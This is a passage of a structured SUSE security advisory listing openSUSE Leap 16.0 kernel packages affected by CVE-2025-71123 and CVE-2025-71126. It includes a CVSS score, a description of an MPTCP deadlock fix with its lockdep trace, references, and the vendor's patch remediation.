"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71123"
},
{
"cve": "CVE-2025-71126",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71126"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: avoid deadlock on fallback while reinjecting\n\nJakub reported an MPTCP deadlock at fallback time:\n\n WARNING: possible recursive locking detected\n 6.18.0-rc7-virtme #1 Not tainted\n --------------------------------------------\n mptcp_connect/20858 is trying to acquire lock:\n ff1100001da18b60 (\u0026msk-\u003efallback_lock){+.-.}-{3:3}, at: __mptcp_try_fallback+0xd8/0x280\n\n but task is already holding lock:\n ff1100001da18b60 (\u0026msk-\u003efallback_lock){+.-.}-{3:3}, at: __mptcp_retrans+0x352/0xaa0\n\n other info that might help us debug this:\n Possible unsafe locking scenario:\n\n CPU0\n ----\n lock(\u0026msk-\u003efallback_lock);\n lock(\u0026msk-\u003efallback_lock);\n\n *** DEADLOCK ***\n\n May be due to missing lock nesting notation\n\n 3 locks held by mptcp_connect/20858:\n #0: ff1100001da18290 (sk_lock-AF_INET){+.+.}-{0:0}, at: mptcp_sendmsg+0x114/0x1bc0\n #1: ff1100001db40fd0 (k-sk_lock-AF_INET#2){+.+.}-{0:0}, at: __mptcp_retrans+0x2cb/0xaa0\n #2: ff1100001da18b60 (\u0026msk-\u003efallback_lock){+.-.}-{3:3}, at: __mptcp_retrans+0x352/0xaa0\n\n stack backtrace:\n CPU: 0 UID: 0 PID: 20858 Comm: mptcp_connect Not tainted 6.18.0-rc7-virtme #1 PREEMPT(full)\n Hardware name: Bochs, BIOS Bochs 01/01/2011\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x6f/0xa0\n print_deadlock_bug.cold+0xc0/0xcd\n validate_chain+0x2ff/0x5f0\n __lock_acquire+0x34c/0x740\n lock_acquire.part.0+0xbc/0x260\n _raw_spin_lock_bh+0x38/0x50\n __mptcp_try_fallback+0xd8/0x280\n mptcp_sendmsg_frag+0x16c2/0x3050\n __mptcp_retrans+0x421/0xaa0\n mptcp_release_cb+0x5aa/0xa70\n release_sock+0xab/0x1d0\n mptcp_sendmsg+0xd5b/0x1bc0\n sock_write_iter+0x281/0x4d0\n new_sync_write+0x3c5/0x6f0\n vfs_write+0x65e/0xbb0\n ksys_write+0x17e/0x200\n do_syscall_64+0xbb/0xfd0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n RIP: 0033:0x7fa5627cbc5e\n Code: 4d 89 d8 e8 14 bd 00 00 4c 8b 5d f8 41 8b 93 08 03 00 00 59 5e 48 83 f8 fc 74 11 c9 c3 0f 1f 80 00 00 00 00 48 8b 45 10 0f 05 \u003cc9\u003e c3 83 e2 39 83 fa 08 75 e7 e8 13 ff ff ff 0f 1f 00 f3 0f 1e fa\n RSP: 002b:00007fff1fe14700 EFLAGS: 00000202 ORIG_RAX: 0000000000000001\n RAX: ffffffffffffffda RBX: 0000000000000005 RCX: 00007fa5627cbc5e\n RDX: 0000000000001f9c RSI: 00007fff1fe16984 RDI: 0000000000000005\n RBP: 00007fff1fe14710 R08: 0000000000000000 R09: 0000000000000000\n R10: 0000000000000000 R11: 0000000000000202 R12: 00007fff1fe16920\n R13: 0000000000002000 R14: 0000000000001f9c R15: 0000000000001f9c\n\nThe packet scheduler could attempt a reinjection after receiving an\nMP_FAIL and before the infinite map has been transmitted, causing a\ndeadlock since MPTCP needs to do the reinjection atomically from WRT\nfallback.\n\nAddress the issue explicitly avoiding the reinjection in the critical\nscenario. Note that this is the only fallback critical section that\ncould potentially send packets and hit the double-lock.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71126",
"url": "https://www.suse.com/security/cve/CVE-2025-71126"
},
{
"category": "external",
"summary": "SUSE Bug 1256755 for CVE-2025-71126",
"url": "https://bugzilla.suse.com/1256755"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
